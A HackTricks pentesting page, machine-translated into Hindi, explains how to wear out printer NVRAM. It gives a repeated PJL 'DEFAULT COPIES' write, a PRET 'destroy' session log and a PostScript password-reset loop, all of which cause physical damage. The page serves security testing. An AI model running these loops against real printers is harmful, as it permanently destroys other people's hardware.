hacktricks/network-services-pentesting/pentesting-printers/physical-damage.md
Translator workflow 75e8745ba3 Translated to Hindi
2023-11-06 08:38:02 +00:00

8 KiB

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

प्रिंटर और अन्य एम्बेडेड उपकरणों के लिए लंबे समय तक सेटिंग्स NVRAM (NVRAM) में संग्रहीत की जाती है, जो पारंपरिक रूप से EEPROM या फ़्लैश मेमोरी के रूप में कार्यान्वित होती है। दोनों कंपोनेंट का सीमित जीवनकाल होता है। आजकल, फ़्लैश मेमोरी के विक्रेताओं द्वारा लगभग 100,000 रीव्राइट करने की गारंटी दी जाती है जब तक कि किसी भी राइट त्रुटि का सामना न हो जाए।

PJL

NVRAM राइट कार्यक्षमता को नष्ट करने के लिए एक व्यावहारिक परीक्षण के लिए, व्यक्तिगत मानों के साथ नकलों की संख्या के लिए लंबे समय तक का मान निरंतर सेट किया जा सकता है, जहां X के लिए विभिन्न मान हो सकते हैं:

@PJL DEFAULT COPIES=X

आमतौर पर, लिखने की अनुमति रोकने से पहले सभी NVRAM पैरामीटर को कारख़ाने की मानक मूल्य में ठीक किया जाता है और सभी चरों को वर्तमान प्रिंट जॉब के लिए @PJL SET... कमांड का उपयोग करके बदला जा सकता है।

PRET का उपयोग करके:

./pret.py -q printer pjl
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> destroy
Warning: This command tries to cause physical damage to the
printer NVRAM. Use at your own risk. Press CTRL+C to abort.
Starting NVRAM write cycle loop in... 10 9 8 7 6 5 4 3 2 1 KABOOM!
Dave, stop. Stop, will you? Stop, Dave. Will you stop, Dave?
[... wait for about 24 hours ...]
I'm afraid. I'm afraid, Dave. Dave, my mind is going...
NVRAM died after 543894 cycles, 18:46:11

PostScript

PostScript के लिए, एक ऐसी प्रविष्टि को ढूंढना चाहिए जो एक पुनरारंभ के बाद भी बच जाती है (और इसलिए किसी न किसी प्रकार के NVRAM में संग्रहीत होनी चाहिए)। एक अच्छा उम्मीदवार पोस्टस्क्रिप्ट पासवर्ड हो सकता है।
PostScript एक स्क्रिप्ट चला सकता है जो अपने खुद के NVRAM को क्षतिग्रस्त करता है:

/counter 0 def
{ << /Password counter 16 string cvs
/SystemParamsPassword counter 1 add 16 string cvs
>> setsystemparams /counter counter 1 add def
} loop

इन तकनीकों के बारे में अधिक जानकारी http://hacking-printers.net/wiki/index.php/Physical_damage में मिल सकती है।

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
  • क्या आप साइबर सुरक्षा कंपनी में काम करते हैं? क्या आप अपनी कंपनी को HackTricks में विज्ञापित देखना चाहते हैं? या क्या आपको PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग करने की इच्छा है? SUBSCRIPTION PLANS की जांच करें!

  • खोजें The PEASS Family, हमारा विशेष NFTs संग्रह।

  • प्राप्त करें आधिकारिक PEASS & HackTricks swag

  • शामिल हों 💬 Discord समूह या टेलीग्राम समूह में या मुझे Twitter 🐦@carlospolopm** का** अनुसरण करें।**

  • अपने हैकिंग ट्रिक्स को hacktricks रेपो और hacktricks-cloud रेपो में पीआर जमा करके साझा करें।